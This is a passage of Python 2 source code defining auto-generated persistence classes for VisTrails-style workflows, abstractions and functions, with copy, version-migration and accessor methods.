self.db_parameters_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBFunction.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBFunction(id=self._db_id,
pos=self._db_pos,
name=self._db_name)
if self._db_parameters is None:
cp._db_parameters = []
else:
cp._db_parameters = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_parameters]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_parameters_id_index = dict((v.db_id, v) for v in cp._db_parameters)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBFunction()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'pos' in class_dict:
res = class_dict['pos'](old_obj, trans_dict)
new_obj.db_pos = res
elif hasattr(old_obj, 'db_pos') and old_obj.db_pos is not None:
new_obj.db_pos = old_obj.db_pos
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'parameters' in class_dict:
res = class_dict['parameters'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_parameter(obj)
elif hasattr(old_obj, 'db_parameters') and old_obj.db_parameters is not None:
for obj in old_obj.db_parameters:
new_obj.db_add_parameter(DBParameter.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_parameters') and hasattr(new_obj, 'db_deleted_parameters'):
for obj in old_obj.db_deleted_parameters:
n_obj = DBParameter.update_version(obj, trans_dict)
new_obj.db_deleted_parameters.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_parameters:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_parameter(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_parameters)
if remove:
self.db_deleted_parameters = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_parameters:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_pos(self):
return self._db_pos
def __set_db_pos(self, pos):
self._db_pos = pos
self.is_dirty = True
db_pos = property(__get_db_pos, __set_db_pos)
def db_add_pos(self, pos):
self._db_pos = pos
def db_change_pos(self, pos):
self._db_pos = pos
def db_delete_pos(self, pos):
self._db_pos = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_parameters(self):
return self._db_parameters
def __set_db_parameters(self, parameters):
self._db_parameters = parameters
self.is_dirty = True
db_parameters = property(__get_db_parameters, __set_db_parameters)
def db_get_parameters(self):
return self._db_parameters
def db_add_parameter(self, parameter):
self.is_dirty = True
self._db_parameters.append(parameter)
self.db_parameters_id_index[parameter.db_id] = parameter
def db_change_parameter(self, parameter):
self.is_dirty = True
found = False
for i in xrange(len(self._db_parameters)):
if self._db_parameters[i].db_id == parameter.db_id:
self._db_parameters[i] = parameter
found = True
break
if not found:
self._db_parameters.append(parameter)
self.db_parameters_id_index[parameter.db_id] = parameter
def db_delete_parameter(self, parameter):
self.is_dirty = True
for i in xrange(len(self._db_parameters)):
if self._db_parameters[i].db_id == parameter.db_id:
if not self._db_parameters[i].is_new:
self.db_deleted_parameters.append(self._db_parameters[i])
del self._db_parameters[i]
break
del self.db_parameters_id_index[parameter.db_id]
def db_get_parameter(self, key):
for i in xrange(len(self._db_parameters)):
if self._db_parameters[i].db_id == key:
return self._db_parameters[i]
return None
def db_get_parameter_by_id(self, key):
return self.db_parameters_id_index[key]
def db_has_parameter_with_id(self, key):
return key in self.db_parameters_id_index
def getPrimaryKey(self):
return self._db_id
class DBAbstraction(object):
vtType = 'abstraction'
def __init__(self, id=None, cache=None, name=None, namespace=None, package=None, version=None, internal_version=None, tag=None, location=None, functions=None, annotations=None):
self._db_id = id
self._db_cache = cache
self._db_name = name
self._db_namespace = namespace
self._db_package = package
self._db_version = version
self._db_internal_version = internal_version
self._db_tag = tag
self.db_deleted_location = []
self._db_location = location
self.db_deleted_functions = []
self.db_functions_id_index = {}
if functions is None:
self._db_functions = []
else:
self._db_functions = functions
for v in self._db_functions:
self.db_functions_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAbstraction.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAbstraction(id=self._db_id,
cache=self._db_cache,
name=self._db_name,
namespace=self._db_namespace,
package=self._db_package,
version=self._db_version,
internal_version=self._db_internal_version,
tag=self._db_tag)
if self._db_location is not None:
cp._db_location = self._db_location.do_copy(new_ids, id_scope, id_remap)
if self._db_functions is None:
cp._db_functions = []
else:
cp._db_functions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_functions]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_functions_id_index = dict((v.db_id, v) for v in cp._db_functions)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAbstraction()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'cache' in class_dict:
res = class_dict['cache'](old_obj, trans_dict)
new_obj.db_cache = res
elif hasattr(old_obj, 'db_cache') and old_obj.db_cache is not None:
new_obj.db_cache = old_obj.db_cache
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'internal_version' in class_dict:
res = class_dict['internal_version'](old_obj, trans_dict)
new_obj.db_internal_version = res
elif hasattr(old_obj, 'db_internal_version') and old_obj.db_internal_version is not None:
new_obj.db_internal_version = old_obj.db_internal_version
if 'tag' in class_dict:
res = class_dict['tag'](old_obj, trans_dict)
new_obj.db_tag = res
elif hasattr(old_obj, 'db_tag') and old_obj.db_tag is not None:
new_obj.db_tag = old_obj.db_tag
if 'location' in class_dict:
res = class_dict['location'](old_obj, trans_dict)
new_obj.db_location = res
elif hasattr(old_obj, 'db_location') and old_obj.db_location is not None:
obj = old_obj.db_location
new_obj.db_add_location(DBLocation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_location') and hasattr(new_obj, 'db_deleted_location'):
for obj in old_obj.db_deleted_location:
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_location.append(n_obj)
if 'functions' in class_dict:
res = class_dict['functions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_function(obj)
elif hasattr(old_obj, 'db_functions') and old_obj.db_functions is not None:
for obj in old_obj.db_functions:
new_obj.db_add_function(DBFunction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_functions') and hasattr(new_obj, 'db_deleted_functions'):
for obj in old_obj.db_deleted_functions:
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_functions.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_location is not None:
children.extend(self._db_location.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_location = None
to_del = []
for child in self.db_functions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_function(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_location)
children.extend(self.db_deleted_functions)
children.extend(self.db_deleted_annotations)
if remove:
self.db_deleted_location = []
self.db_deleted_functions = []
self.db_deleted_annotations = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_location is not None and self._db_location.has_changes():
return True
for child in self._db_functions:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_cache(self):
return self._db_cache
def __set_db_cache(self, cache):
self._db_cache = cache
self.is_dirty = True
db_cache = property(__get_db_cache, __set_db_cache)
def db_add_cache(self, cache):
self._db_cache = cache
def db_change_cache(self, cache):
self._db_cache = cache
def db_delete_cache(self, cache):
self._db_cache = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_internal_version(self):
return self._db_internal_version
def __set_db_internal_version(self, internal_version):
self._db_internal_version = internal_version
self.is_dirty = True
db_internal_version = property(__get_db_internal_version, __set_db_internal_version)
def db_add_internal_version(self, internal_version):
self._db_internal_version = internal_version
def db_change_internal_version(self, internal_version):
self._db_internal_version = internal_version
def db_delete_internal_version(self, internal_version):
self._db_internal_version = None
def __get_db_tag(self):
return self._db_tag
def __set_db_tag(self, tag):
self._db_tag = tag
self.is_dirty = True
db_tag = property(__get_db_tag, __set_db_tag)
def db_add_tag(self, tag):
self._db_tag = tag
def db_change_tag(self, tag):
self._db_tag = tag
def db_delete_tag(self, tag):
self._db_tag = None
def __get_db_location(self):
return self._db_location
def __set_db_location(self, location):
self._db_location = location
self.is_dirty = True
db_location = property(__get_db_location, __set_db_location)
def db_add_location(self, location):
self._db_location = location
def db_change_location(self, location):
self._db_location = location
def db_delete_location(self, location):
if not self.is_new:
self.db_deleted_location.append(self._db_location)
self._db_location = None
def __get_db_functions(self):
return self._db_functions
def __set_db_functions(self, functions):
self._db_functions = functions
self.is_dirty = True
db_functions = property(__get_db_functions, __set_db_functions)
def db_get_functions(self):
return self._db_functions
def db_add_function(self, function):
self.is_dirty = True
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_change_function(self, function):
self.is_dirty = True
found = False
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
self._db_functions[i] = function
found = True
break
if not found:
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_delete_function(self, function):
self.is_dirty = True
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
if not self._db_functions[i].is_new:
self.db_deleted_functions.append(self._db_functions[i])
del self._db_functions[i]
break
del self.db_functions_id_index[function.db_id]
def db_get_function(self, key):
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == key:
return self._db_functions[i]
return None
def db_get_function_by_id(self, key):
return self.db_functions_id_index[key]
def db_has_function_with_id(self, key):
return key in self.db_functions_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
class DBWorkflow(object):
vtType = 'workflow'
def __init__(self, modules=None, id=None, entity_type=None, name=None, version=None, last_modified=None, connections=None, annotations=None, plugin_datas=None, others=None, vistrail_id=None):
self.db_deleted_modules = []
self.db_modules_id_index = {}
if modules is None:
self._db_modules = []
else:
self._db_modules = modules
for v in self._db_modules:
self.db_modules_id_index[v.db_id] = v
self._db_id = id
self._db_entity_type = entity_type
self._db_name = name
self._db_version = version
self._db_last_modified = last_modified
self.db_deleted_connections = []
self.db_connections_id_index = {}
if connections is None:
self._db_connections = []
else:
self._db_connections = connections
for v in self._db_connections:
self.db_connections_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_plugin_datas = []
self.db_plugin_datas_id_index = {}
if plugin_datas is None:
self._db_plugin_datas = []
else:
self._db_plugin_datas = plugin_datas
for v in self._db_plugin_datas:
self.db_plugin_datas_id_index[v.db_id] = v
self.db_deleted_others = []
self.db_others_id_index = {}
if others is None:
self._db_others = []
else:
self._db_others = others
for v in self._db_others:
self.db_others_id_index[v.db_id] = v
self._db_vistrail_id = vistrail_id
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBWorkflow.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBWorkflow(id=self._db_id,
entity_type=self._db_entity_type,
name=self._db_name,
version=self._db_version,
last_modified=self._db_last_modified,
vistrail_id=self._db_vistrail_id)
if self._db_modules is None:
cp._db_modules = []
else:
cp._db_modules = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_modules]
if self._db_connections is None:
cp._db_connections = []
else:
cp._db_connections = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_connections]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_plugin_datas is None:
cp._db_plugin_datas = []
else:
cp._db_plugin_datas = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_plugin_datas]
if self._db_others is None:
cp._db_others = []
else:
cp._db_others = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_others]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_vistrail_id') and ('vistrail', self._db_vistrail_id) in id_remap:
cp._db_vistrail_id = id_remap[('vistrail', self._db_vistrail_id)]
# recreate indices and set flags
cp.db_modules_id_index = dict((v.db_id, v) for v in cp._db_modules)
cp.db_connections_id_index = dict((v.db_id, v) for v in cp._db_connections)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_plugin_datas_id_index = dict((v.db_id, v) for v in cp._db_plugin_datas)
cp.db_others_id_index = dict((v.db_id, v) for v in cp._db_others)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBWorkflow()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'modules' in class_dict:
res = class_dict['modules'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_module(obj)
elif hasattr(old_obj, 'db_modules') and old_obj.db_modules is not None:
for obj in old_obj.db_modules:
if obj.vtType == 'module':
new_obj.db_add_module(DBModule.update_version(obj, trans_dict))
elif obj.vtType == 'abstraction':
new_obj.db_add_module(DBAbstraction.update_version(obj, trans_dict))
elif obj.vtType == 'group':
new_obj.db_add_module(DBGroup.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_modules') and hasattr(new_obj, 'db_deleted_modules'):
for obj in old_obj.db_deleted_modules:
if obj.vtType == 'module':
n_obj = DBModule.update_version(obj, trans_dict)
new_obj.db_deleted_modules.append(n_obj)
elif obj.vtType == 'abstraction':
n_obj = DBAbstraction.update_version(obj, trans_dict)
new_obj.db_deleted_modules.append(n_obj)
elif obj.vtType == 'group':
n_obj = DBGroup.update_version(obj, trans_dict)
new_obj.db_deleted_modules.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'connections' in class_dict:
res = class_dict['connections'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_connection(obj)
elif hasattr(old_obj, 'db_connections') and old_obj.db_connections is not None:
for obj in old_obj.db_connections:
new_obj.db_add_connection(DBConnection.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_connections') and hasattr(new_obj, 'db_deleted_connections'):
for obj in old_obj.db_deleted_connections:
n_obj = DBConnection.update_version(obj, trans_dict)
new_obj.db_deleted_connections.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'plugin_datas' in class_dict:
res = class_dict['plugin_datas'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_plugin_data(obj)
elif hasattr(old_obj, 'db_plugin_datas') and old_obj.db_plugin_datas is not None:
for obj in old_obj.db_plugin_datas:
new_obj.db_add_plugin_data(DBPluginData.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_plugin_datas') and hasattr(new_obj, 'db_deleted_plugin_datas'):
for obj in old_obj.db_deleted_plugin_datas:
n_obj = DBPluginData.update_version(obj, trans_dict)
new_obj.db_deleted_plugin_datas.append(n_obj)
if 'others' in class_dict:
res = class_dict['others'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_other(obj)
elif hasattr(old_obj, 'db_others') and old_obj.db_others is not None:
for obj in old_obj.db_others:
new_obj.db_add_other(DBOther.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_others') and hasattr(new_obj, 'db_deleted_others'):
for obj in old_obj.db_deleted_others:
n_obj = DBOther.update_version(obj, trans_dict)
new_obj.db_deleted_others.append(n_obj)
if 'vistrail_id' in class_dict:
res = class_dict['vistrail_id'](old_obj, trans_dict)
new_obj.db_vistrail_id = res
elif hasattr(old_obj, 'db_vistrail_id') and old_obj.db_vistrail_id is not None:
new_obj.db_vistrail_id = old_obj.db_vistrail_id
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_connections:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_connection(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_plugin_datas:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_plugin_data(child)
to_del = []
for child in self.db_others:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_other(child)
to_del = []
for child in self.db_modules:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_connections)
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_plugin_datas)
children.extend(self.db_deleted_others)
children.extend(self.db_deleted_modules)
if remove:
self.db_deleted_connections = []
self.db_deleted_annotations = []
self.db_deleted_plugin_datas = []
self.db_deleted_others = []
self.db_deleted_modules = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_connections:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_plugin_datas:
if child.has_changes():
return True
for child in self._db_others:
if child.has_changes():
return True
for child in self._db_modules:
if child.has_changes():
return True
return False
def __get_db_modules(self):
return self._db_modules
def __set_db_modules(self, modules):
self._db_modules = modules
self.is_dirty = True
db_modules = property(__get_db_modules, __set_db_modules)
def db_get_modules(self):
return self._db_modules
def db_add_module(self, module):
self.is_dirty = True
self._db_modules.append(module)
self.db_modules_id_index[module.db_id] = module
def db_change_module(self, module):
self.is_dirty = True
found = False
for i in xrange(len(self._db_modules)):
if self._db_modules[i].db_id == module.db_id:
self._db_modules[i] = module
found = True
break
if not found:
self._db_modules.append(module)
self.db_modules_id_index[module.db_id] = module
def db_delete_module(self, module):
self.is_dirty = True
for i in xrange(len(self._db_modules)):
if self._db_modules[i].db_id == module.db_id:
if not self._db_modules[i].is_new:
self.db_deleted_modules.append(self._db_modules[i])
del self._db_modules[i]
break
del self.db_modules_id_index[module.db_id]
def db_get_module(self, key):
for i in xrange(len(self._db_modules)):
if self._db_modules[i].db_id == key:
return self._db_modules[i]
return None
def db_get_module_by_id(self, key):
return self.db_modules_id_index[key]
def db_has_module_with_id(self, key):
return key in self.db_modules_id_index
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_connections(self):
return self._db_connections
def __set_db_connections(self, connections):
self._db_connections = connections
self.is_dirty = True
db_connections = property(__get_db_connections, __set_db_connections)
def db_get_connections(self):
return self._db_connections
def db_add_connection(self, connection):
self.is_dirty = True
self._db_connections.append(connection)
self.db_connections_id_index[connection.db_id] = connection
def db_change_connection(self, connection):
self.is_dirty = True
found = False
for i in xrange(len(self._db_connections)):
if self._db_connections[i].db_id == connection.db_id:
self._db_connections[i] = connection
found = True
break
if not found:
self._db_connections.append(connection)
self.db_connections_id_index[connection.db_id] = connection
def db_delete_connection(self, connection):
self.is_dirty = True
for i in xrange(len(self._db_connections)):
if self._db_connections[i].db_id == connection.db_id:
if not self._db_connections[i].is_new:
self.db_deleted_connections.append(self._db_connections[i])
del self._db_connections[i]
break
del self.db_connections_id_index[connection.db_id]
def db_get_connection(self, key):
for i in xrange(len(self._db_connections)):
if self._db_connections[i].db_id == key:
return self._db_connections[i]
return None
def db_get_connection_by_id(self, key):
return self.db_connections_id_index[key]
def db_has_connection_with_id(self, key):
return key in self.db_connections_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_change_annotation(self, annotation):
